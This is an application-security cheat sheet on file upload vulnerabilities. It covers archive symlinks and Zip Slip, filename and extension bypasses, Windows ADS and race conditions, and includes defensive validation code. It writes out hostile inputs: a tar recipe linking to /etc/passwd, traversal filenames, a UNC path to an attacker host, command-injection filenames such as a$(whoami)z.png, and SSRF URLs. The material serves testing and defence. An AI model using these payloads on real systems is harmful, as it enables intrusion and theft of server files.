Application Security Cheat Sheet

File Upload Vulnerabilities


Last updated 2 years ago

Abuse archives

Weaknesses arise when a file upload function accepts and extracts archives without proper security measures in place.

Abusing symlinks

tar and zip allow symlinks to be included in the archives they generate. If an application does not properly validate the contents of an archive before extracting it, this can lead to arbitrary reading or writing of files.

References:

Abusing tar permissions

If an application uses the Unix tar command to extract .tar files, removes symlinks and then accesses a subdirectory directly, you can try to bypass the symlink removal step with tar permissions. The Unix tar command preserves the Unix permissions of files and directories when creating an archive. If you create a parent directory that nobody has read permission for (chmod 300) and a subdirectory with full permissions (chmod 700), you can place symlinks inside the subdirectory: a symlink removal step that walks the tree from the parent will not find them, but they will be found when the subdirectory is accessed directly, because the subdirectory itself is readable.

$ mkdir parent
$ cd parent
$ tar cf a.tar . --mode=300
$ mkdir sub
$ cd sub
$ ln -s /etc/passwd file.txt
$ cd ..
$ tar -rf a.tar sub

Zip Slip

Zip Slip takes advantage of archives containing entries whose names carry specially placed path traversal sequences; once extracted, they can write any file to any directory the web server has access to. It can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z.
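The three archive issues above (symlink entries, the tar permissions trick and Zip Slip) are all caught by inspecting the member list before anything touches the disk. The following is an added example in Python, not code from the original page: it builds a constructed tarball containing a benign file, a traversal entry and a symlink to /etc/passwd, and refuses to extract it.

```python
import io
import os
import tarfile

def build_sample_tar() -> bytes:
    """Constructed sample archive (not from the page): one benign file,
    one Zip Slip entry and one symlink pointing at a sensitive host file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        payload = b"hello\n"
        for name in ("docs/readme.txt", "../../etc/cron.d/job"):
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
        link = tarfile.TarInfo("sub/file.txt")  # like the ln -s example above
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc/passwd"
        tar.addfile(link)
    return buf.getvalue()

def unsafe_members(archive: bytes, dest: str) -> list:
    """Names of entries that must not be extracted into dest.

    The check reads the archive's member list rather than walking extracted
    directories, so unreadable directories (the --mode=300 trick) cannot
    hide an entry from it."""
    root = os.path.realpath(dest)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        for m in tar.getmembers():
            target = os.path.realpath(os.path.join(root, m.name))
            if os.path.commonpath([root, target]) != root:
                bad.append(m.name)  # resolves outside dest: Zip Slip
            elif m.issym() or m.islnk() or m.isdev():
                bad.append(m.name)  # links can point anywhere; devices are never needed
    return bad

def safe_extract(archive: bytes, dest: str) -> list:
    """Extract only if every entry passed the checks; returns extracted names."""
    bad = unsafe_members(archive, dest)
    if bad:
        raise ValueError(f"refusing to extract unsafe entries: {bad}")
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        tar.extractall(dest)
        return [m.name for m in tar.getmembers()]
```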

Abuse filename

Path as filename

Try to use different kinds of paths as a filename:

  • Absolute path, for example filename=/etc/passwd

  • Relative path, for example filename=../../../../../../etc/passwd

  • UNC path, for example filename=\\attacker-website.com\file.png

Injections via filename

Try to exploit command injection or SQL injection via the filename, for example a$(whoami)z.png, a`whoami`z.png or a';select+sleep(10);--z.png

SSRF via filename

Try to send a URL as the filename to get a blind SSRF, for example filename=https://172.17.0.1/internal/file. You can also try to change type="file" to type="url" within a request.

DoS via large filename

Try to upload a file with a very long name; sometimes this leads to DoS.

References:

Bypass restrictions

Content-Type

Try to change the Content-Type value:

  • Allowed MIME-type + disallowed extension

  • Disallowed MIME-type + allowed extension

  • Remove Content-Type

  • Send Content-Type twice within request with allowed and disallowed MIME-types

Magic bytes

If an application uses a file's magic bytes to deduce the Content-Type, you can try to bypass security measures by forging the magic bytes of an allowed file type. For example, if GIF images are allowed, you can prepend a GIF image's magic bytes GIF89a to make the server think it is receiving a valid GIF.

References:

Extension

Try to change a file extension:

  • Less-common extension, such as .phtml

  • Double extension, such as .jpg.svg or .svg.jpg

  • Extension with a delimiter, such as %0a, %09, %0d, %00, #, etc. For example, file.png%00.svg or file.png\x0d\x0a.svg

  • Empty extension, for example file.

  • Extension with varied capitalization, such as .sVG

  • Right-to-left override, for example file.%E2%80%AEphp.jpg

  • Try to cut the allowed extension using the maximum filename length.

  • Empty filename, for example .svg

  • Send the filename twice within a request with allowed and disallowed extensions, for example filename="file.png";filename="file.svg"

Invalid regex

Windows dots

On Windows, when a file is created with a trailing full stop, it is saved without that trailing character, which can lead to blacklist bypasses in Windows file uploads.

For example, if an application is rejecting files that end in .aspx, you can upload a file called shell.aspx.. Now this filename will bypass the blacklist, as .aspx != .aspx., but upon saving the file to the server, Windows will cut out the trailing ., leaving shell.aspx.

Windows ADS

An Alternate Data Stream (ADS) is a little-known feature of the NTFS file system. It allows data to be forked into an existing file without changing the file's size or behaviour. In other words, ADS allows you to hide a file inside another one.

The following example hides a copy of calc.exe inside file.txt:

C:> echo Somedata > file.txt
C:> type file.txt
Somedata
C:> type c:\windows\system32\calc.exe > file.txt:calc.exe

To start the hidden calc.exe copy, you can run the following command:

C:> start c:\file.txt:calc.exe
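The bypasses listed under Content-Type, Magic bytes, Extension, Windows dots and Windows ADS share one root cause: the server trusts the client-supplied name or type. The following is an added example in Python, not code from the original page; the allowlist of three image types and their magic bytes is an assumption for illustration. It normalises the name first (so what is checked is what Windows or the filesystem will actually store) and then requires the extension, Content-Type and magic bytes to agree.

```python
import re
import unicodedata

# Assumed allowlist for this example: extension -> (Content-Type, magic-byte prefixes)
ALLOWED = {
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
}

def normalize_filename(name: str) -> str:
    """Reduce a client-supplied filename to a single safe base name."""
    # Drop NUL, control and format characters; this removes the %00 delimiter
    # trick and U+202E (right-to-left override) alike
    name = "".join(c for c in name if unicodedata.category(c)[0] != "C")
    # Keep only the last path component (covers absolute, relative and UNC paths)
    name = re.split(r"[\\/]", name)[-1]
    # Drop an NTFS alternate data stream suffix such as file.txt:calc.exe
    name = name.split(":", 1)[0]
    # Windows silently strips trailing dots and spaces, so strip them before checking
    name = name.rstrip(". ")
    stem, _, ext = name.rpartition(".")
    if not stem:                 # ".svg" or "passwd": treat as having no extension
        stem, ext = ext, ""
    # Collapse the stem to a conservative character set; this also folds a
    # double extension such as file.php.jpg into file_php.jpg
    stem = re.sub(r"[^A-Za-z0-9_-]", "_", stem)[:64] or "file"
    return f"{stem}.{ext.lower()}" if ext else stem

def validate_upload(name: str, content_type: str, data: bytes) -> str:
    """Return the filename to store, or raise ValueError explaining the rejection."""
    safe = normalize_filename(name)
    ext = safe.rpartition(".")[2] if "." in safe else ""
    if ext not in ALLOWED:
        raise ValueError(f"extension not allowed: {safe!r}")
    expected_ct, magics = ALLOWED[ext]
    # Content-Type must match the extension, not merely be on the allowlist
    if content_type.split(";")[0].strip().lower() != expected_ct:
        raise ValueError(f"Content-Type {content_type!r} does not match .{ext}")
    # Magic bytes must match the same type; a forged GIF89a header on an SVG fails here
    if not any(data.startswith(m) for m in magics):
        raise ValueError("file content does not match extension")
    return safe
```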

References:

Third-party vulnerabilities

Vulnerabilities in image processors

Resources:

  • Zeronights 2021: Emil Lerner – HotPics

FFmpeg

ExifTool

ExifTool versions 7.44 through 12.23 inclusive are vulnerable to a local command execution vulnerability when processing DjVu files. If an application passes uploaded files to ExifTool, this can lead to RCE.

References:

Configuration files

Some servers/frameworks read configuration files at runtime to define various settings and restrictions. The most famous examples are the Apache httpd/Tomcat .htaccess and the ASP.NET/IIS web.config files. Identify the server/framework and try to upload a suitable config file to bypass some security measures or even execute code.

References:

Potentially dangerous files

ASP

Try to upload files with the asp, ashx, asmx, asa, aspx, cer or xamlx extensions to an IIS server to get RCE.

References:

Adobe ColdFusion

Try to upload ColdFusion files with the cfm, cfml, cfc or dbm extensions to get RCE.

Adobe ColdFusion SSRF

JSP

Try to upload JSP files with the jsp, jspx, jsw, jsv, or jspf extensions to get RCE.

Perl

Try to upload Perl files with the pl, pm, cgi, or lib extensions to get RCE.

SVG

XML

Try to upload a valid XML file with external entities to get XXE.

References:

Race condition

File upload race condition

If an application writes an uploaded file directly to the target folder before the file passes validation, you can abuse this behaviour with a race condition.

Suppose file upload has the following flow:

  1. Upload file to a target folder

  2. Validate file

  3. If the validation fails, remove the file. Otherwise, send the link to a user

You can use a race condition to fetch the file between steps 1 and 3 while validation is in progress.

References:

URL-based file upload race condition

If an application allows users to upload a file by providing a URL and fetches the file into a user-accessible folder for validation, you can abuse this behaviour with a race condition.

Suppose file upload has the following flow:

  1. Receive the URL from a user

  2. Create a local copy for validation within a user-accessible folder

  3. Validate file

  4. If the validation fails, reject the URL. Otherwise, send the link to a user

You can use a race condition to fetch the file between steps 2 and 4 while validation is in progress.
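Both race conditions above come from validating a file after it has already landed somewhere users can reach. The following is an added example in Python, not code from the original page, of the flow that removes the window: write to a non-served quarantine directory (for the URL-based variant, fetch the URL into the same directory), validate there, and only then publish with an atomic rename under a server-generated name. The directory paths and the minimal PNG check are assumptions for illustration.

```python
import os
import secrets
import tempfile
from typing import Optional

# Constructed paths for this example (not from the original page)
PUBLIC_DIR = "/tmp/demo-public"       # contents are served to users
QUARANTINE = "/tmp/demo-quarantine"   # never served; validation happens here

def is_valid_png(path: str) -> bool:
    """Minimal content check standing in for the real validator."""
    with open(path, "rb") as f:
        return f.read(8) == b"\x89PNG\r\n\x1a\n"

def store_upload(data: bytes) -> Optional[str]:
    """Write to quarantine, validate, then publish atomically.

    Returns the published path, or None if the file was rejected. At no point
    does an unvalidated file exist under PUBLIC_DIR, so a concurrent request
    cannot fetch it while validation (steps 2 and 3 above) is still running.
    """
    os.makedirs(PUBLIC_DIR, exist_ok=True)
    os.makedirs(QUARANTINE, exist_ok=True)
    # Random temporary name in the non-served directory; mkstemp creates it mode 0600
    fd, tmp_path = tempfile.mkstemp(dir=QUARANTINE)
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        if not is_valid_png(tmp_path):
            return None
        # Server-generated name: the client-supplied filename is never used on disk
        final = os.path.join(PUBLIC_DIR, secrets.token_hex(16) + ".png")
        # os.replace is an atomic rename on the same filesystem: readers see either
        # nothing or the fully validated file, never a partial or unvalidated one
        os.replace(tmp_path, final)
        return final
    finally:
        if os.path.exists(tmp_path):  # rejected or failed: remove the quarantined copy
            os.unlink(tmp_path)

def quarantine_leftovers() -> list:
    """Files still in quarantine; should be empty after every request."""
    return os.listdir(QUARANTINE)
```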

References:

SSRF via HTTP range requests

If an application downloads a file from a user-provided link using HTTP range requests, you can try to redirect the request for one of the chunks to an internal server.

References:

References

  • Report: Read files on application server, leads to RCE
  • Report: profile-picture name parameter with large value lead to DoS for other users and programs on the platform
  • Full list of known file magic bytes
  • Report: RTL override symbol not stripped from file names
  • CVE-2018-14364: How did I find a bug in Gitlab project import and got shell access
  • NTFS ALTERNATE DATA STREAMS: THE GOOD AND THE BAD
  • Video (Zeronights 2021: Emil Lerner – HotPics)
  • Slides (Zeronights 2021: Emil Lerner – HotPics)
  • Report: RCE when removing metadata with ExifTool
  • Writeup: ExifTool CVE-2021-22204 - Arbitrary Code Execution
  • Writeup: Bypass file upload filter with .htaccess
  • HTSHELLS - Self contained web shells and other attacks via .htaccess files
  • Upload a web.config File for Fun & Profit
  • PayloadsAllTheThings: Examples of insecure ASP files
  • Report: Uploaded XLF files result in External Entity Execution
  • Report: XXE at ecjobs.starbucks.com.cn/retail/hxpublic_v6/hxdynamicpage6.aspx
  • Writeup: My first XML External Entity (XXE) attack with .gpx file
  • Web Security Academy: File upload vulnerabilities - Exploiting file upload race conditions
  • Web Security Academy: File upload vulnerabilities - Race conditions in URL-based file uploads
  • HTTP range requests
  • Writeup: Vimeo upload function SSRF
  • Zip Slip Vulnerability
  • SecurityTips: File upload bugs
  • File Upload Vulnerability Tricks And Checklist
  • Slides: File Upload by @0xAwali
  • GitLab issue #55501: Reading local files by abusing tar permissions in Gitlab Imports (Possibly leading to RCE)
  • GitHub - ptoomey3/evilarc: Create tar/zip archives that can exploit directory traversal vulnerabilities
  • GitHub - snyk/zip-slip-vulnerability: Zip Slip Vulnerability (Arbitrary file write through archive extraction)
  • GitHub - barrracud4/image-upload-exploits: This repository contains various media files for known attacks on web applications processing media files. Useful for penetration tests and bug bounty.
  • Cheat sheets: Server Side Request Forgery, SVG Abuse, Race Condition